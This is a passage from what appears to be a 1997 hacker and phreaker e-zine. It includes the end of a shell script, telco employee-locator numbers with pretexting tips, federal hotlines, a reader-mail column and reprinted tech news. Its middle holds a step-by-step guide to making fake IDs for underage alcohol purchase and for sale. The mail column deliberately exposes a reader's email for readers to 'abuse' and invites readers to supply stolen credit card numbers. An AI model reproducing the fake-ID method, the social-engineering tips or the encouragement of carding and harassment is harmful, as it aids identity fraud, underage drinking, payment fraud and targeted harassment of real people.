#-----------------------------------------------------------------
# Number the lines
#-----------------------------------------------------------------
lines=`wc -l $Duplist | awk '{print $1}'`
#-----------------------------------------------------------------
# Does the directory exist?
#-----------------------------------------------------------------
case $lines in
0)
echo "Not found: add(y/n)?\c"
read ans
if [ $ans = 'y' ]
then
Newline=$1
addline $Newline
if [ $error = 1 ]
then
return 1
fi
else
return 1
fi
;;
1)
Flist=`cat $Duplist`
;;
*)
echo
awk '{ printf "%2d : %s\n", NR, $0 }' $Duplist
echo "-----------------------------------------------------------------------"
echo -n "(Enter directory number or 'q' for none)? \c"
read lineno
if [ $lineno = 'q' ]
then
echo "Removing possible duplications from file list..."
cat "$FileDir" | sort | uniq > $Duplist
if [ $? = 0 ]
then
echo "Sorted and cleaned $FileDir"
mv $Duplist $FileDir
fi
return 1
fi
while [ $lineno -gt $lines -o $lineno -lt 1 -o $lineno = 'q' ]
do
echo -n "Valid input: 1-$lines or q. Re-enter number: \c"
read lineno
done
if [ $lineno = 'q' ]
then
return 1
fi
Flist=`sed -n "${lineno}p" $Duplist`
;;
esac
echo "Changing directory to: $Flist"
echo "\n"
ccd $Flist 2> /dev/null
if [ $? != 0 ]
then
echo "Removing defunct $Flist from $FileDir"
cat $FileDir | grep -v $Flist > $Duplist
if [ $? = 0 ]
then
mv $Duplist $FileDir
else
echo "An error occured while editing $FileDir. It may be damaged"
fi
fi
}
ecd $1
}
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/KnH5eXk/jGmY7AQFWAwf+IXUFbYOnZWXrg0DfJj49Yv/tJ3V1Jfz8
fQ2BUUJhUxSEEe2RjQbr0D8gnQkG/EGOLAP4MvkKQVqyRHhFF+AsO3QEtIH1WGDI
x6Z/aAQv0ALWE/qUQR0lgPToVClECz/mdEKi4Z92UUYPmrrYO8Uv3DKhmDwWvNTE
hSXKWNsrBhS/eJhQqF3ptk7EoWL2C4fgLchTjy7faHY+w7WGocHQf3SvPJCDdi7n
tQoLzxsBL0skBhuzGIeQvInBPHrRRIT1hAq0Q4Si5tp7PxAds7YFXWPzCel1HccE
VpOUJaQ/H8QlUxDqzoF/jeWIuqES9qxNauCET+VUA4uX3J3RlC0ycg==
=vVWe
-----END PGP SIGNATURE-----
_____________________________________________________________
KEEPING UP WITH THE TELCOS--- by ArcAngl
Employee News & Information Lines:
---------------------------------
The phone company has a phone number that their employees can call up and find out what's new with
the company, how the company's stock is doing, what new advances in phones have been discovered and
how they're catching people like us. To get a newsline number, call the phone company's main office and
ask
them for it. Sometimes they won't know what you're talking about but keep
pestering them until they give it to you. Below is a small list of newslines.
Bell Atlantic....................(800)-647-NEWS
Ameritech.......................(800)-893-LINE
(312)-917-9797
Main Numbers & Employee Locators:
--------------------------------
An employee locator is a service for Bell employees that helps you find out
exactly what department any employee of Bell works for. Sometimes automated,
you enter in the name of the employee on your touch tone phone and the
computer will rattle off their work phone number, street address and state.
Most locators have a live operator who you just ask for the information.
Usually the employee locator is the same number as the main number. To get
this number, call up directory asisstance and ask them for the phone company's
main number. Call the main number and if they're not the employee locator, ask
them for that number. In most cases, it's given to you, no questions asked.
If you can't get the phone company's main number from directory asisstance,
try calling the billing office and ask them. Below is a short list of numbers.
Bell Atlantic (West Virginia)..........(304)-954-6202
Bell Atlantic (Virginia)...............(804)-225-6300
Cincinnati Bell (Ohio).................(513)-397-5775
South Central Bell (Jackson, Miss.)....(601)-961-1327
Southwestern Bell (Little Rock, Ark.)..(501)-373-9800
U.S. West (Western U.S.)...............(800)-879-4357
Ameritech (Indianapolis, IN)...........(317)-265-2266
Southern Bell (South Carolina).........(800)-336-0014
Pacific Bell (Los Angeles, CA).........(213)-339-6622
_____________________________________________________________
The Weather Report: Federal Hotline Numbers
By: WeatherM
-------------------------------------------------------
Department of Agriculture 1 800 424 9121
Department of Defense 1 800 424-9098
Environmental Protection Agency 1 800 424-9346
Department of Health and Human Services 1 800 368-5779
Department of Housing 1 800 669-9777
Railroad Retirement Board 1 800 772 4258
Small Business Administration 1 800 827 5722
Social Security Administration 1 800 772 1213
Department of Veterans Affairs 1 800 827 2039
Federal Emergency Management Agency 1 800 638 6620
Federal Job Information 1 202 606 2700
-------------------------------------------------------
Have fun you little boogers.
Contact Info
weatherm@beer.com
weatherm@thepentagon.com
www.surfsouth.com/~weatherm/
_____________________________________________________________
Fake IDs by N-TREEG
This article is for all of you out there that's ever wanted to make yourself
a fake ID. THTJ brings you a quick and easy method. Note, these type of ID's
won't get you into a club, nor will they get you alcohol from a major liquor
store that scrutinizes ID's closely. These will get you alcohol at a grocery
store if a teenage cashier asks you for some id while you're buying that
bottle of wine cooler (or rum I luv rum!). Shall we begin? All righty...
MATERIALS
Okay you're gonna need a few things. Here's what you'll need:
1) A computer and a printer, preferably inkjet or laser.
2) Transparencies that are suited to work with your type of printer. Some
regular white (or colored/patterned) printer paper would be nice too.
3) An index card.
4) A small laminating machine. You can pick these up from Office Depot for
about $49. Split the cost with some friends. Or if you're gonna be
selling ID's it'll eventually pay for itself.
5) Laminating pouches to use in the laminating machine. These don't usually
come with the laminating machine. Don't forget to pick some up. Also
found at Office Depot.
6) Colorful paper currency from a foreign country. Go to your local bank and
ask to purchase some paper bills from maybe a Caribbean island or
something. They usually have nicely colored paper money. Something with
green, yellow, orange, tan, or red works well. Make sure the money has
some sort of government seal on it.
7) A good picture of yourself. When you take the picture, make sure you are
in front of a solid colored background. It wouldn't fool anyone if you use
a picture of yourself taken in front of a brick wall. Try to take the
picture in front of a solid colored wall or curtain.
MAKING THE ID
Okay now that you've gathered your necessities, it's time to go to work. First
you want to make your info sheet with your computer. In a word processor,
make a box about the size of a drivers license with the info you want to
appear on your id. Include a name, address, identification number, birthdate,
etc. etc. Make sure you leave space to the left for a picture to go. Now
print up the sheet on a transparency and cut it out.
Lay your transparency over the paper money. Get the idea now? The paper
money makes a great background. Slip your picture in between the transparency
and the paper money background in the spot you left empty for the photo.
Doesn't that look great? Well almost. The side with the picture on it is
thicker isn't it? That's what you use the index card for. Cut an index card
in the shape of the id minus the amount of space the photo takes up. Now
place the index card behind the paper money and the whole thing should be
about equal depth.
Now go back to your computer and print out some stuff for the back of your id.
Make a little box with the caption "thumb print" if you like, then you can
stick your thumb in an ink pad and put your thumb print in the box to make the
id look more authentic. Also put up some stuff about blood type. Make a
rectangular box at the bottom for a signature. At the top put up a heading
with something similar to "PROPERTY OF THE ISLAND OF BARBADOS U.S. Embassy"
or some b.s. like that. Do whatever comes to mind with it. Print it out on
your regular white computer paper (or you can go for that patterned paper they
sell at office depot). Cut it to size and attach it to the back of the id
with the index card sandwiched between the white paper and the paper money.
Once you're satisfied with the way your id is laid out, follow your
laminiator's instructions to seal your id in plastic. Make sure the edges
are smooth and rounded and try not to let any air-bubbles gather in your
laminated id.
You've now got yourself a pretty cheesy id. But hey, sometimes they work.
A good friend of mine uses his all the time at a gas station to buy beer.
They are also helpful if you go on cruises to places like say.....Cancun!
where they _really_ don't care how old you are, but you still gotta have
some kind of ID.
Here's a few suggestions and add-ons for your id. When making your
transparency, make a copy of the government seal off of the paper currency.
Incorporate that into your transparency to make it look more authentic. I
personally don't know where to get holograms made or how to incorporate them.
For something similar, try to get some of that "rainbow" like paper they use
in gift baskets...the kind that change colors and shimmers when you reflect
light off of it. Put some of that behind the seal to make an illusion of a
hologram. You can also try reflective tape (by 3M), I don't know how well
that will work. It's up to you to experiment. Have fun, and play nicely!
Special thanks to SirRob for introducing me to the concept.
And remember, HaX0r3d PerceptionS leases .... THTJ ownz!
N-TREEG
HaX0r3d PerceptionS
http://www.afn.org/~afn56746
Shouts to the UF crew; HBS and THTJ; #'s phreak, 2k, & area66 on the
undernet; PADmaster & speed1
_____________________________________________________________
Oddville, THTJ - from the demented e-mail send to Scud-O
Once again, it is time for some of the oddest, craziest, and
stupidest e-mail that gets sent to me every month.. so on with the show!
Again, if i reply to an e-mail, the reply is inside the brackets.
---
To: scud@thtj.com
Subject: i am a leet hax0r
3y3 w45 w0n3r1ng 1f y0u w3r3 3v3r g01ng t0 d0 4ny w4r3z 4rt1cl3s. mY
0-d4y s1t3 l15ts 4r3 0uT 0f d4t3 4nD y0u 4r3 r34lly l33t! w3 sh0uld f0rm
a l33t hax0rs 0nly gr0up 4nd tr4d3 w4r3z#!@#$@#$@#@#$@#%
3m4il m3 b4ck wi7h s0m3 si7e liSt AnD yOuR RePly tO hAxOrInG#$@$%^@#%$@$#^
acidburn@aol.com
[ umm, sorry 'acidburn' but i just cant read your 'ereet' text. i can
not understand what you are saying, sorry. ]
---
Subject:
Hi
Date:
Thu, 10 Jul 97 06:26:25 +0000
From:
MegaBrat13@aol.com
To:
FoxMulder@worldnet.att.net
So where can I get havoc the program?
[ wtf? ]
---
Date: Tue, 22 Jul 1997 01:37:21 -0700
From: Joe Roebuck <xei33@dial.pipex.com>
To: scud@thtj.com
Subject: (no subject)
X-URL: ftp://guest:macwarez@207.16.248.126/darkdajimbo/pages/kewl.htm
while scouring the net for elite hackers to join power empires ELITE
FACTION - your name got mentioned...
if you would like to be part of an elite faction of
hackers/crackers/virii etc then please reply to this message at
xei33@dial.pipex.com.
If you are on here accidently then ignore this message and if you are
already in power empire ignore this message, otherwise hit return and
join the elite faction.
Power empire has over 600 members and 6 different factions, the King is
looking to set up an elite faction and has been looking for worthy
members, your naem has come up.....
if your interested mail the king at xei33@dial.pipex.com
[ 10 minutes of laughter.......... ]
[ 10 more minues of laughter ....... ]
---
Subject:
password cracking
Date:
Wed, 23 Jul 97 18:02:05 +0000
From:
"KeViN TRaViS" <just4kevin@hotmail.com>
To:
mcoyle@sirinet.net
CC:
FoxMulder@worldnet.att.net [KFF got this one too]
i have a problem that only a hacker can solve. i just moved out and my
father gave me his computer, complete with his internet account. the
problem: he left blocks to certain web sites that i don't know the
password to (you know those RSACi blocks?). how can I get through these
blocks and/or crack his password.
:lestat
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
[ look, little underage kiddies should not be looking at porn. shame on you. ]
----
Subject:
Mailing List
Date:
Mon, 14 Jul 97 04:06:29 +0000
From:
SickboyJR@aol.com
To:
Scud-O
can you please put me on the mailing list? send the journal to:
danishiqbal@juno.com
[ DAMNIT! I THOUGHT I TOLD YOU PEOPLE TO STOP USING MY
OLD E-MAIL ADDRESS!!!!, to teach you a lesson, im not gunna
cover up yer e-mail, so you readers, feel free to abuse
this aoler. ]
---
Subject:
mailing list
Date:
Mon, 14 Jul 97 22:51:56 +0000
From:
PsYcHoFaZe@aol.com
To:
Scud-O
can i join your mailing list's? my e-mail address is
psychofaze@aol.com
[ read above ]
---
Subject:
thtj.com
Date:
Mon, 14 Jul 97 04:44:25 +0000
From:
psych0
To:
<Scud-O>
it doesn't work. i cannot access your server. netscape just sits there
and times out, and if i set ping to send 20 packets, only about 2 or 3
come back, the rest time out. what's up with this? aren't you paying a
bit of money for this? i think it's time to give nethosting.com a nasty
letter....
[ i agree, i agree. nethosting www server is fine, but every other server
is totally fucked up... oh well.... cant wait to move.... ]
---
Subject:
Subscribe to THTJ
Date:
Sun, 13 Jul 97 06:53:47 +0000
From:
AbrAxaS <abraxas@internetwis.com>
To:
Scud-O
Hey, can ya hook me up with the current THTJ and any back issues
available. I'd appreciate it and may be interested in submitting for
future editions. Thanx, take 'er easy. -=] AbrAxaS [=-
[ look, to you and the 500 other people who ask me this question each
month, i DO NOT HAVE THE TIME to send you every issue of thtj. if i did, all
i would do in life is send out thtj - since it would be a 24/7 job. go
download it yerself ya bum. ]
---
Subject:
Web Ring
Date:
Thu, 17 Jul 97 17:54:07 +0000
From:
"X-human" <X-human@inil.com>
To:
<Scud-O>
X-human here
I was woundering if you wanted to be in my web ring called Phreakz "R"
Uz. A new Web Ring. I am looking for good phreaking pages that are phone
losers of america, prank, or just plain phreaking.I like your page and
wounder if you want to join my ring please droop me a line if you do.
Thank you for your time.
\ /
\ /
\ /
\/-}{ü/\/\å/\/ ;P
/\President of Bad Taste Inc. Phreaks "R" Us corp.
/ \Creativeity Board of Directors for the Who
/ \Ring Master of the Phreakz "R" Uz Web Ring
/ \Ring Master of the Made in NotePad Web Ring
[ i really dont go for web rings, but i may start doing so, if i do i will
join up woth you. i posted your e-mail in case any of the readers want to
join with you. i hope you dont mind. ]
---
Subject:
unabomber
Date:
Sun, 13 Jul 97 05:01:43 +0000
From:
phett <weasel@bluemoon.net>
To:
Scud-O
hey,
is unabomber from the wester ny area? i'm in need of some local folk's
to relate shit to. let me know if you can find out.
phett
[ no, he's not from ny. where he is from, i will never tell. ]
---
Subject:
HELP
Date:
Tue, 15 Jul 97 15:05:30 +0000
From:
"apiter@usa.net" <apiter@usa.net>
To:
Scud-O
I'm Sorry i badly write as to English.
I from Russia Saint-Peterstburg.
Help please to me need real number
credit card for registration IBM global
Network.
My E-Mail: apiter@usa.net
Big Thanks
[ i dont card myself, now i would normally mock you for carding because it
is stupid,but, since you are a Russian Comrade, i posted your e-mail incase
one of our readers can help you out. i hope one of them does. ]
---
Subject:
D-Con
Date:
Wed, 16 Jul 97 17:37:11 +0000
From:
xxxxxxxx <xxxxxxxx@xxx.net>
Reply-To:
x.x.xxx@xxxx.xxx.net, xxx@xxxx.xxx.net, xxxx@xxxx.xxx.net,
xxxxxx@xxxx.xxx.net, xx.@xxxx.xxx.net, xxxxx@xxxx.xxx.net
Organization:
-
To:
Scud-O
Hey did you go to the Con in Vegas if so Email your deal at
xxxxxxxx@xxx.com or xxxxxx@xxxxxxxxx.net im doing a piece for a movie
the pusuit of cyberculture-- get to me
[ dont make me laugh.... ]
---
Subject:
nice
Date:
Tue, 15 Jul 97 19:53:39 +0000
From:
BlueBox868@aol.com
To:
Scud-O
I really learned a lot from your page man. I loved it. You need to E mail
me sometime so that we can talk about phreaking or hacking. See ya man.
In case your wondering 18/M here,
[ um, i wasnt wondering, and i dont care about yer aol a/s checks. and if you
want to talk phreak, e-mail me, im sorry but my life is too busy to just
start talking with complete strangers. ]
---
Reply-To: "Cracker" <cracker@waymark.net>
From: "Cracker" <cracker@waymark.net>
To: <scud@thtj.com>
Date: Sun, 20 Jul 1997 09:58:54 -0500
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE Engine V4.71.0544.0
Join the power empire---visit us to learn more about us at http://homepages.
waymark.net/~cracker/
[ ummm.... wtf? ]
---
Date: Sun, 27 Jul 1997 18:07:47 -0400
From: Spooky <spookyy@erols.com>
Organization: Probably hiding somewhere in the shadows...clutching her modem.
To: bertoli@australia.net.au, acid@smtp1.erols.com, frogy@aol.com,
actionman@thepentagon.com, "@actmatrix"@gnn.com, kblue@ziplink.net,
jmfoster@mtu.edu, acidhack@smtp1.erols.com, 0@aol.com,
alex@is-bremen.de, ailurophilia@psynet.net, archum55@aol.com,
Mistryx@ix.netcom.com, babygoat@usit.net, badboy@cei.net,
bernies@2600.com, big_mac@pacific.net.sg, Black_So_6@hotmail.com,
bob@sitecraft.com, borison@ibm.com, oblivion@10pht.com,
bbuster@succeed.net, lychees@bellsouth.net, mindcocaine@hotmail.com,
phreak@deathsdoor.com, qdgh09b@prodigy.com, cracked@primenet.com,
ChAos@smtp1.erols.com, 1021@aol.com, carzydevil@geocities.com,
yczn98a@prodigy.com, cyberchaos@geocities.com, bstock@cris.com,
fist@ping.at, viviana1@idt.net, arctcfox@warwick.net,
darkdajimbo@northeast.demon.co.uk, damage@idt.net, zpvg33a@prodigy.com,
scud@thtj.com, dasxdeath@aol.com, 2rump@flash.net, nomad@imagin.net,
steven20steven@juno.com, deathhead@pointbrk.erkware.com,
demaxxus@usa.net, christopher_mewhort@sunshine.net, djgad@aol.com,
qfwg61a@prodigy.com, DolphinBoy@juno.com,
blizzardskick@worldnet.att.net, dzca66a@prodigy.com,
exilesquid@earthlink.net, lordfaust@mailcity.com,
wysiwyg@netwestonline.com, wicket@slip.net, bc@koan.com,
bassin@worldnet.att.net, faheem@innotts.co.uk, tempest30@aol.com,
draco@lords.com, goncalves@process.com, hackers24@hotmail.com,
stormn@wave.co.nz, krees@downeast.net, snake7@swbell.net,
hotheazip@aol.com, shvostov@accesscom.com, howthehel@aol.com,
icefx@idt.net, in@smtp1.erols.com, quotes@aol.com,
illusionz@mail.geocities.com, jjd@netcomuk.co.uk, trifraug@mscomm.com,
KoDiaK@hotmail.com, kripto@hotmail.com, kwantam@mailhost.net,
icowart@sprintnet.com, Ryder@sisna.com, xebec@juno.com,
lordsome@cris.com, lumpster@aol.com, Mad_hacker@juno.com,
mage2@earthlink.net, commodore64@geocities.com, mnikon@sundial.net,
patrickbc@freemark.com, georgina@linknet.net, melvyn@mbwa.demon.co.uk,
metl2rhcp@aol.com, moroni@scranton.com, muardib@freemark.com,
mudge@10pht.com, dravis@mdc.net, necroman@juno.com,
prophet9980@pacbell.net, powder@bright.net, butler@tir.com,
k0p@iti2.net, ovrsoul@main.com, mcoyle@sirinet.net,
phantom2000@msn.com, mark@panicx.com, phreak@megalink.net,
a666@smtp1.erols.com, cool@aol.com, tedphreak@aol.com,
hchitten@sprynet.com, psykon@hotmail.com, stuartlock@intonet.co.uk,
revelation@mindspring.com, roma@loop.com, rowboat@telis.org,
emiley@cae.wisc.edu, shadout@smtp1.erols.com, xx@aol.com,
chriss@burgoyne.com, spacerog@10pht.com, sublime61@aol.com,
mauricer@videotron.ca, sward@magicnet.net, ufc@chaos.gun.de,
velocity@nym.alias.net, 81764205@cshore.com, vylent@hotmail.com,
warman0@hotmail.com, msteen@postoffice.ptd.net, tmbg91@aol.com,
jklh60a@prodigy.com, x1scythe@aol.com, zep@garbage.bridge.net,
zillion@gatecoms.gatecom.com, zol@smtp1.erols.com, tar12@aol.com,
hutcheson@btinternet.com
Subject: Hackbook
Most of the material thats in people's faces is anti-hack. They spend countless hours,
pages, bandwidth, what have you, blabbing on and on about how evil the hacking society
is. How addicted and destructive we all are.
I'd like to change that. I want you to send me something about yourself and why
you hack/phreak, your opinions on it. Be it an essay, a story, anything! i'm not
picky. Though it must be done well. Spend some time on it. You're representing
hackers/phreakers world round. You don't have to include your real name or any RL
information about yourself. Just your handle, something to identify yourself by and I
won't include your e-mail address if you don't want me to. It can be as abstract or as
realistic as you like it but it has to be about YOU and some of the little episodes
that people usually don't get a chance to experience and see. There's no page
limit...the longer the better. Be as detailed as possible. NO LAMERS ACCEPTED!
After this is done my main goal is to get this thing published. So, if you have any
contacts, ideas, submissions, whatever, e-mail me:
spookyy@erols.com
The beginning deadline is October 31, 97.
[ roflol!@#?@$@#!$#%!@$ ]
_____________________________________________________________
--------------
--=[The News]=--
Compiled & edited by KungFuFox
--------------
1 : Snafu sets off chaos on Net Human error
2 : German Telco Pioneers Internet Telephony
3 : 3 Yemenis sue NASA for trespassing on Mars
4 : AOL Posts Sentry against Viruses
<anonymous> why can't you bastards make some news?
_____________________________________________________________
Snafu sets off chaos on Net Human error:
E-mail blocked and Web sites vanish.
By David L. Wilson and Elizabeth Wasserman, Mercury News Staff Writers
A human error sent the global Internet into chaos Thursday, bouncing
millions of e-mail messages back to senders and repeatedly informing users
that their favorite Web sites simply did not exist.
The cyberspace meltdown began in the early morning hours after a technician
at Network Solutions Inc. in Virginia, which controls the Net's most
important electronic directory of addresses, programmed the network's
computers with incorrect data.
Thursday's huge outage renewed concerns about the fragile underpinnings of
the Internet, the global network of networks that is playing an increasingly
critical role in commerce and communications.
Employees of Network Solutions quickly sent out corrected address information
to the Internet's computers, but the fix took hours to trickle down through
all the systems used to route data in cyberspace. Intermittent outages
continued throughout the day.
While the garbling of the address database is not unprecedented, experts said
the disruption was unusual because of its scope and persistence. "I don't
think I've seen it this bad before," said Todd Stanford, an Internet
consultant in San Jose who spent much of the day wrestling with problems
caused by the outage.
Network Solutions, which is responsible for administering the most popular
"domain names," including those ending with .com, is also responsible for
programming key computers on the Net used to route data. The addressing
information is stored in the Domain Name Server system.
When any kind of information -- whether electronic mail or a Web site address
-- is sent out on the Net, the sender's local computers check with other
computers, called servers, that are part of the Domain Name Server system, to
ensure proper delivery. For example, if a person sends an e-mail missive to
joe@internetprovider.com, the sender's system looks to the Domain Name Server
system to see how the e-mail should be routed.
Server hierarchy
If the necessary address information can't be found on a local computer,
that local server checks with another address server higher up the chain.
The most important parts of the system are the top-level domain zone
servers. There are nine of them, eight in the United States and one in
Europe.
In cases where the Internet routing computers get confused or don't know what
to do next, they look to these top-level servers for instructions, and the
top-level servers have final authority.
It was while implementing one of the regular updates to the database on the
top-level servers Wednesday night that an unidentified Network Solutions
technician erred, the company said. A glitch in Network Solutions computers
created bad information in files that the technician was preparing to
transmit to the servers. The company has monitoring software that can spot
such glitches, but the technician implemented the update despite the alert
from the software, violating company policy.
The result was that the database on the Net for two types of domains, those
that end in .com and .net, was corrupted.
Hopeless muddle
The erroneous updates went out about 2:30 a.m. EDT Thursday, and slowly
spread through the address system. By the time a corrected version of the
file was distributed by Network Solutions about four hours later, much of
the Internet's addressing mechanism was hopelessly muddled.
"The Internet's never been as reliable as something like the phone system,"
said David Filo, co-founder of Yahoo, the Silicon Valley company that helps
people search the Web. "Over the last few years, it's actually gotten better.
At the same time, it's been growing so rapidly that in some sense, it's also
gotten more fragile."
"The people who are assuming that they are building on a stable
infrastructure are in for some big surprises," said Eugene H. Spafford, head
of a computer security lab at Purdue University.
To Spafford, there was also a lighter side to the outage. "It was actually
very pleasant. I went a whole day without getting any spam. I got a lot done
and I'm thinking we may need to do this more often."
Despite the explanation of human error, many observers suspected something
more nefarious at work, perhaps a prank launched last week that may have
gotten out of hand.
Hijacking InterNIC
Network Solutions operates an entity called InterNIC, under contract to the
National Science Foundation, that handles registration of some of the most
important domain names. On July 11, a group calling itself "AlterNIC," which
objects to what it calls InterNIC's monopoly on registration of some domain
names, hijacked the main Web address used to access InterNIC.
InterNIC controls registration to the domain names .com, .net, .edu, .org,
.gov and .mil.
Rival companies such as AlterNIC have created their own categories of domain
names, such as .biz, but those have not been as widely accepted on the Net,
and not every Net user can reach sites that they register.
Over the weekend, AlterNIC used a security flaw in many Internet computers to
redirect Net users who tried to access "www.internic.net" to the AlterNIC
site, in what the company described as a "protest." (Users could still get to
the InterNIC from the AlterNIC site, or use InterNIC's alternate address,
http://rs.internic.com/).
"By redirecting the domain name `www.internic.net,' we are protesting the
recent InterNIC claim to ownership of `.com,' `.org,' and `.net,' which they
were supposed to be running in the public trust," said a letter from
AlterNIC's Eugene Kashpureff, the chief financial officer, posted on the
AlterNIC Web site. "Our apologies for any trouble this DNS domain name system
protest has caused you."
Kashpureff, in an interview, said the company ended the protest Monday
morning, but as late as Thursday, some Net users were still being routed to
the AlterNIC site when they tried to access InterNIC.
Both Kashpureff and Network Solutions deny that his actions led to Thursday's
problems.
Others suspected a deliberate attack on the network's infrastructure,
something that federal authorities have been sweating about for years. An FBI
agent who agreed to comment on condition of anonymity said, "This is clearly
one way of damaging the economic interests of this country, and we are
looking at this incident, any such incident, for evidence that this is a
deliberate act of sabotage. But we have no evidence at all to suggest that at
the present time."
Bill Orvis, a member of the Energy Department's Computer Incident Advisory
Capability at Lawrence Livermore Lab, agreed. "It's not impossible that
there is some kind of attack going on, but I think the odds of this one thing
being an attack are low."
©1997 San Jose Mercury News
_____________________________________________________________
German Telco Pioneers Internet Telephony
(07/18/97; 6:30 p.m. EDT)
By Douglas Hayward, TechWire
FRANKFURT, Germany -- Internet voice telephony took a giant leap forward
Friday when Deutsche Telekom became the first of the world's major telephone
companies to launch an international trial of the fledgling technology.
Deutsche Telekom, Europe's largest telecommunications carrier and Internet
service provider, said it has begun piloting an Internet-based voice
telephony service between the United States, Germany, Japan and Canada. The
pilot, which involves customers using ordinary handsets rather than
computers, will involve 1,000 users, mostly employees of multinational
companies.
"The targets of this project are to test the technology, to analyze the
usage, and to evaluate whether Internet telephony can be offered at lower
rates than conventional telephone service," Deutsche Telekom said in a
statement Friday.
The service will be restricted to selected regions, mostly large cities,
within the four countries. Customers will use ordinary telephones to call a
number in each country that routes their calls to an Internet "gateway." From
the gateway, voice signals are compressed into digitized information
"packets," which are transported across the Internet, using the TCP/IP
protocol, to the gateway nearest the number they are calling. At this second
gateway, the call is decompressed, and it re-enters the ordinary public
telephone network as an seemingly ordinary telephone call.
Deutsche Telekom will not charge pilot customers for the cost of carrying the
call over the Internet nor for the cost of terminating the call over the
public network. Instead, callers will only have to pay the cost of accessing
the gateways, set at about 24 pfennings (13 cents) a minute just under a
fifth of the cost of a normal voice call from Germany to the United States.
Analysts welcomed the announcement by Deutsche Telekom. "This is an
interesting and creative move," said Andrew Clarke, an analyst at
London-based telecommunications researcher Philips Tarifica. "It will be
interesting to see how Deutsche Telekom charges for the full service. I would
estimate very roughly that the full charge could be around 60 pfennings (33
cents) a minute, which is cheap but not so cheap that it's almost free," he
said.
Although the Finnish national telco announced an Internet telephony service
several months ago, Deutsche Telekom is the first major telco to embrace the
technology. Tarifica estimated in May this year that independent Internet
voice telephony carriers would cost Deutsche Telekom, British Telecom and
France Telecom a combined total of some $372 million per year by 2001.
"The major telcos are all testing this technology, but it's an interesting
and positive sign that it was Deutsche Telekom that was the first to come out
into the open," said Cathy Burrows, a British-based analyst at researcher
International Data Corp. "At the end of the day, pricing is going to be key.
Every telco has to think very carefully about what their approach is going to
be."
Even at the rate of 60 pfennings, Deutsche Telekom will likely be undercut by
independent carriers such as Hackensack, N.J.-based IDT, which is about to
introduce handset-based Internet telephony for 10 cents a minute between
Germany and the United States. "We can beat Deutsche on price and scope, and
we think we can beat them on quality too," said Sarah Hofstepter, a
spokeswoman for IDT.
"It looks like Deutsche Telekom's pilot is being pitched as an alternative to
[charge] cards and to call-back services rather than as a competitor to
traditional telephony," Tarifica's Clarke said. "That shows Deutsche Telekom
is using Internet telephony creatively."
Many analysts said that the major carriers have no choice in the matter they
have to embrace the Internet in order to control and contain it.
"Deutsche Telekom has realized that it makes sense for you to get into
Internet telephony early, so that if users are tempted to defect to voice
telephony, they at least are tempted onto your service rather than onto
someone else's," said Clarke. "If your throat is going to be cut anyway, why
not do it yourself?"
©CMP Media, 1996.
_____________________________________________________________
3 Yemenis sue NASA for trespassing on Mars
They say they inherited it 3,000 years ago
July 24, 1997
WASHINGTON (CNN) -- No one expects to lose much sleep over it but, for the
record, NASA has been sued by three men from Yemen for invading Mars.
The three say they own the red planet, and claim they have documents to prove
it.
"We inherited the planet from our ancestors 3,000 years ago," they told the
weekly Arabic-language newspaper Al-Thawri, which published the report
Thursday.
Adam Ismail, Mustafa Khalil and Abdullah al-Umari filed the lawsuit in San'a,
Yemen, and presented documents to the country's prosecutor general which they
say proves their claim. There was no word on whether they had paid the
appropriate inheritance taxes.
The claim is prompted, apparently, by the exploration of Mars by NASA's
Pathfinder spacecraft and Sojourner rover, which have been sending back
photos and data for analysis since early July.
"Sojourner and Pathfinder, which are owned by the United States government,
landed on Mars and began exploring it without informing us or seeking our
approval," the men charge.
They demand the immediate suspension of all operations on Mars until a court
delivers a verdict. They also ask that NASA refrain from disclosing any
information pertaining to Mars' atmosphere, surface or gravity before
receiving approval from them, or until a verdict is reached.
'It's a ridiculous claim'
"It's a ridiculous claim," NASA news chief Brian Welch told CNN Thursday
after smothering a chuckle. "Mars is a planet out in the solar system that is
the property of all humanity, not two or three guys in Yemen."
Richard Cook, the Pathfinder mission manager at NASA's Jet Propulsion
Laboratory in Pasadena, California, agreed. "It's everybody's," he said.
"Mars is for the whole world to explore and to understand."
Welch says a 1967 international treaty holds that everything in the solar
system, except Earth itself, is the property of everyone in the world and no
one country.
"Just because we land on Mars first doesn't mean the United States owns it,"
he said.
Welch said he thought the issue could get more serious in the future "when
people actually are going to these places and the resources found have some
value. ... More complicated issues will have to be resolved between
countries, or between companies."
Taking the opportunity to clear the air on another galactic real estate
matter, Welch said he knew of no plans to take legal action against a man who
has been selling deeds to property on the moon.
Welch said the deeds are as worthless as the Yemenis' claims. "That's why
they invented the phrase 'Caveat emptor' [Let the buyer beware]," he said.
©1997 CNN
_____________________________________________________________
AOL Posts Sentry against Viruses
by David Lazarus
12:08pm 30.Jul.97.PDT -- Those darn Trojan horses are still knocking at
America Online's door, so the service introduced a new feature Wednesday
intended to prevent members from letting a virus slip through the gates. The
"Download Sentry" is an automatic warning that pops up each time an AOL
subscriber attempts to download email attachments to his or her hard drive.
"We have seen over the last several months an increasing number of Trojan
horses, and more members downloading them," said AOL spokeswoman Tricia
Primrose. "This is a real effort to educate members that there are files out
there that can contain viruses."
What these Trojan horses do is enter one's hard drive when an email
attachment is activated, and then lurk in the shadows until the next time you
log on to AOL. The virus then leaps forward, snatches your password and sends
it back to a waiting hacker, who could, if so inclined, perpetrate all manner
of mischief. Most Trojan horses cannot be spotted in advance by anti-virus
programs.
Tatiana Gau, AOL's vice president of integrity assurance, said "an increasing
number" of members have actually activated Trojans. Often, the virus is
masked behind enticing commands like GAMES.EXE, PORN.EXE, and PLAYBOY.ZIP.
They also hide within add-ons for popular software titles, or in free
screensavers.
The new Download Sentry aims to remind AOL members of the danger. When an
email message with an attached file is downloaded, a window pops up and says:
"Warning! You are about to download a file which contains
executable code.
Downloading files from unknown sources might cause harm to your computing
environment or display objectionable material. Do you wish to proceed?"
If the answer is yes, members do so at their own risk. Those who don't need
to be told twice have the option of switching off the alert.
"The Download Sentry will help our members help themselves - by reminding
them not to download email files sent to them from unknown sources," Gau
said.
©1993-97 Wired Ventures, Inc.
_____________________________________________________________
Logs - from the staff of thtj and our thtj readers...
1- zer0_hex.log - from Keystroke
Session Start: Wed Jun 18 14:17:41 1997
<PcExpoKey> Hey =)
<PcExpoKey> Are you the same Zer0-Hex who writes for that cool magizine thing?
[14:18] <ZeR0-HeX> uh hi
